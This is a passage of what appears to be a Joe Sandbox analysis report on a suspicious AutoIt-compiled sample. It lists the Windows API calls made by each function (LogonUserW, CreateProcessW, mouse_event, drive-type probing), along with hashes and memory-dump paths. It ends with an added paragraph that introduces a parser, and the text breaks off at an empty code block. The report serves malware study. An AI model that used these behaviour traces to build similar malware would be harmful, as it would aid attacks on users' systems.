                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0090C8FE
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    APIs
                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008E4C4A
                                    Similarity
                                    • API ID: mouse_event
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008D8389), ref: 008D87D1
                                    Similarity
                                    • API ID: LogonUser
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,008BB9BC,?,?,?,?,?,?), ref: 0090C934
                                      • Part of subcall function 0090B635: _memset.LIBCMT ref: 0090B644
                                      • Part of subcall function 0090B635: _memset.LIBCMT ref: 0090B653
                                      • Part of subcall function 0090B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00946F20,00946F64), ref: 0090B682
                                      • Part of subcall function 0090B635: CloseHandle.KERNEL32 ref: 0090B694
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00881AEE,?,?,?), ref: 008816AB
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0090C8B4
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0090C885
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                      • Part of subcall function 0088201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008820D3
                                      • Part of subcall function 0088201B: KillTimer.USER32(-00000001,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 0088216E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00881AE2,?,?), ref: 008816D4
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008AA12A
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                    • Instruction ID: 3839de2d887679ae65c6d4375d6ab527ffb68ddb97dc360c686ca4555ebd2467
                                    • Opcode Fuzzy Hash: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                    • Instruction Fuzzy Hash: 09A0123001810CABCA001B41EC044447F9CD6002E07004020F40C40421873255105580
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 909bff7c8dc5e2fa141612666afc866cdc3b5c5f60cfc940238df10d34a7295d
                                    • Instruction ID: a3108b1c07577f671b4745d628c2dad9c24caf0d98b47701bcbf35d78c5adf65
                                    • Opcode Fuzzy Hash: 909bff7c8dc5e2fa141612666afc866cdc3b5c5f60cfc940238df10d34a7295d
                                    • Instruction Fuzzy Hash: 2722143060451BCBDF28AA24C49477CBBE1FB46358F3C826BD956CB692DB70DD91CA42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: c041df5a4fb47c91b9d4f1417c5d54559afcb85ef7ee097883059321a8bae461
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 26C182322050A30AEF6D463D843413EFAA1BFA37B171A075DD8B2DB9D4EE24C965D720
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: ab019f320124dfb35ac268a07ae69c3c1733e274f4e1c60809b3109414c310a1
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: E6C173322051A30AEF3D463E843453EBAA1BFA37B171A076DD4B2DB9D4EE14C925D720
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: db5ccb8c4af99a4d9752350da73db13cead079a295a5b9b74fc989aa20c866a3
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 7CC170322051A309EF6D4639847813EBAA1EFA37B171A176DD4B2DB9C4EE20D925D720
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction ID: e9ae8ca92932e80a157f1ac6f0dc5b7449f83dbb25f5cde1adf86a696c26c6d5
                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction Fuzzy Hash: C841C2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction ID: c5f8c2ba70d5d93516fa70f3652afc6414421d8cd906455ca6e9a796a92ec12b
                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction Fuzzy Hash: 3D01A478A00109EFCB48DF98C5909AEF7F5FF48310F208599DA09AB341D730AE41DB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction ID: 2bae1186ad3a20cfa3aa806440486723b1cfd87d35e429e98b5b3f4ba9dab905
                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction Fuzzy Hash: B6019278A10109EFCB44DF98C5909AEF7F5FB48310F208599DA19AB301D730AE41DB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
                                    • Instruction ID: 12cbbee2ad97ca28ebd479973cedbf0f86dc4bb29c9604106d163cb5d8cfbbc3
                                    • Opcode Fuzzy Hash: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
                                    • Instruction Fuzzy Hash: F6C08C300453C89ADB028759E08C7407BEDAB0AA18F1400E4D8080BA02C3A96A048A45
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 008F785B
                                    • DeleteObject.GDI32(00000000), ref: 008F786D
                                    • DestroyWindow.USER32 ref: 008F787B
                                    • GetDesktopWindow.USER32 ref: 008F7895
                                    • GetWindowRect.USER32(00000000), ref: 008F789C
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008F79DD
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008F79ED
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7A35
                                    • GetClientRect.USER32(00000000,?), ref: 008F7A41
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008F7A7B
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7A9D
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AB0
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7ABB
                                    • GlobalLock.KERNEL32(00000000), ref: 008F7AC4
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AD3
                                    • GlobalUnlock.KERNEL32(00000000), ref: 008F7ADC
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AE3
                                    • GlobalFree.KERNEL32(00000000), ref: 008F7AEE
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 008F7B00
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00912CAC,00000000), ref: 008F7B16
                                    • GlobalFree.KERNEL32(00000000), ref: 008F7B26
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008F7B4C
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008F7B6B
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7B8D
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7D7A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 0867d95d4cfcec0a5f2f4a7c686cfe1f2f215aa699649b05ecdc0f9a37167a34
                                    • Instruction ID: 4a3d3f5545318d6784f68864aa0cc5eb0a735a633c32fa5047d05664fe4fd8dc
                                    • Opcode Fuzzy Hash: 0867d95d4cfcec0a5f2f4a7c686cfe1f2f215aa699649b05ecdc0f9a37167a34
                                    • Instruction Fuzzy Hash: 3F028B71A14119EFEB14DFA8CC99EAE7BB9FB48310F148168F915EB2A1C7709D01DB60
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,0090F910), ref: 00903627
                                    • IsWindowVisible.USER32(?), ref: 0090364B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpperVisibleWindow
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 4105515805-45149045
                                    • Opcode ID: 0065f633b84378dd0871d770a71a92396cae57e3d61dc8a1cc35340b2d00438a
                                    • Instruction ID: e0cc7fe3bb9580859ee742f3d5c487ef60b50de9f959b69a7afd1e09ae5f0472
                                    • Opcode Fuzzy Hash: 0065f633b84378dd0871d770a71a92396cae57e3d61dc8a1cc35340b2d00438a
                                    • Instruction Fuzzy Hash: 55D17E302043119FCB14EF14C456A6E77E9FF95354F188868F8869B7E2DB61EE4ACB42
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0090A630
                                    • GetSysColorBrush.USER32(0000000F), ref: 0090A661
                                    • GetSysColor.USER32(0000000F), ref: 0090A66D
                                    • SetBkColor.GDI32(?,000000FF), ref: 0090A687
                                    • SelectObject.GDI32(?,00000000), ref: 0090A696
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A6C1
                                    • GetSysColor.USER32(00000010), ref: 0090A6C9
                                    • CreateSolidBrush.GDI32(00000000), ref: 0090A6D0
                                    • FrameRect.USER32(?,?,00000000), ref: 0090A6DF
                                    • DeleteObject.GDI32(00000000), ref: 0090A6E6
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0090A731
                                    • FillRect.USER32(?,?,00000000), ref: 0090A763
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090A78E
                                      • Part of subcall function 0090A8CA: GetSysColor.USER32(00000012), ref: 0090A903
                                      • Part of subcall function 0090A8CA: SetTextColor.GDI32(?,?), ref: 0090A907
                                      • Part of subcall function 0090A8CA: GetSysColorBrush.USER32(0000000F), ref: 0090A91D
                                      • Part of subcall function 0090A8CA: GetSysColor.USER32(0000000F), ref: 0090A928
                                      • Part of subcall function 0090A8CA: GetSysColor.USER32(00000011), ref: 0090A945
                                      • Part of subcall function 0090A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090A953
                                      • Part of subcall function 0090A8CA: SelectObject.GDI32(?,00000000), ref: 0090A964
                                      • Part of subcall function 0090A8CA: SetBkColor.GDI32(?,00000000), ref: 0090A96D
                                      • Part of subcall function 0090A8CA: SelectObject.GDI32(?,?), ref: 0090A97A
                                      • Part of subcall function 0090A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0090A999
                                      • Part of subcall function 0090A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090A9B0
                                      • Part of subcall function 0090A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0090A9C5
                                      • Part of subcall function 0090A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090A9ED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 3521893082-0
                                    • Opcode ID: 7730c5f39dbc60203a3d874fd288429c32ae1c09f9d6c64e41b9c4c1075034e7
                                    • Instruction ID: 19f97fb699172462cb13221db2514c6449c50e514e853f5d75be8bfef04a57ac
                                    • Opcode Fuzzy Hash: 7730c5f39dbc60203a3d874fd288429c32ae1c09f9d6c64e41b9c4c1075034e7
                                    • Instruction Fuzzy Hash: 4D918D72418301EFDB609F64DC08A6B7BB9FF89321F104B29F962961E0D771DA44DB92
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 008F74DE
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008F759D
                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008F75DB
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008F75ED
                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7633
                                    • GetClientRect.USER32(00000000,?), ref: 008F763F
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008F7683
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F7692
                                    • GetStockObject.GDI32(00000011), ref: 008F76A2
                                    • SelectObject.GDI32(00000000,00000000), ref: 008F76A6
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008F76B6
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F76BF
                                    • DeleteDC.GDI32(00000000), ref: 008F76C8
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008F76F4
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 008F770B
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008F7746
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008F775A
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 008F776B
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008F779B
                                    • GetStockObject.GDI32(00000011), ref: 008F77A6
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008F77B1
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008F77BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 49c33c317a68347afc472e046a8c30ad7e39bef73b404951903ef3201142ad30
                                    • Instruction ID: 614c9d8ff2dcc2503910ca9b3cddfaf809d1fefed3cde460ea8e054804044808
                                    • Opcode Fuzzy Hash: 49c33c317a68347afc472e046a8c30ad7e39bef73b404951903ef3201142ad30
                                    • Instruction Fuzzy Hash: B2A17F71A54619BFEB14DBA8DC4AFAE7BB9FB09710F004115FA14E72E1D6B0AD00DB60
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EAD1E
                                    • GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EADFB
                                    • SetErrorMode.KERNEL32(00000000,0090FAC0,?,\\.\,0090F910), ref: 008EAF59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: c52ef22180c14e842ae79ac9f9c626fe8924b15b631fdc88f5ea5f84fca4b3bf
                                    • Instruction ID: e8eb6160bfc1f4d72e011551ea7d27d6bdd07a8f26693125b65dfec5e045a7bc
                                    • Opcode Fuzzy Hash: c52ef22180c14e842ae79ac9f9c626fe8924b15b631fdc88f5ea5f84fca4b3bf
                                    • Instruction Fuzzy Hash: 485187B064424A9BCB18EB16D952C7E73B1FF8AB08B204156F407E7291DE71BD41DB53
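The per-function "APIs" entries above (for instance the CreateFileW → ReadFile → CreateStreamOnHGlobal → OleLoadPicture chain at 008F7A9D..008F7B16, or the SetErrorMode/GetDriveTypeW probe at 008EADFB) are more useful to an analyst in structured form than as bullet text. The parser below is an added example written for this page; it is neither Joe Sandbox's code nor anything from the sample. Its input is copied verbatim from the entries above, and its `find_sequence` check assumes that ascending `ref` addresses reflect call order inside one function, which holds for straight-line code but not across loops or branches. The `classify_arg` heuristic that treats any 8-hex-digit token as an immediate is also an assumption about the report's rendering, not a documented rule.

```python
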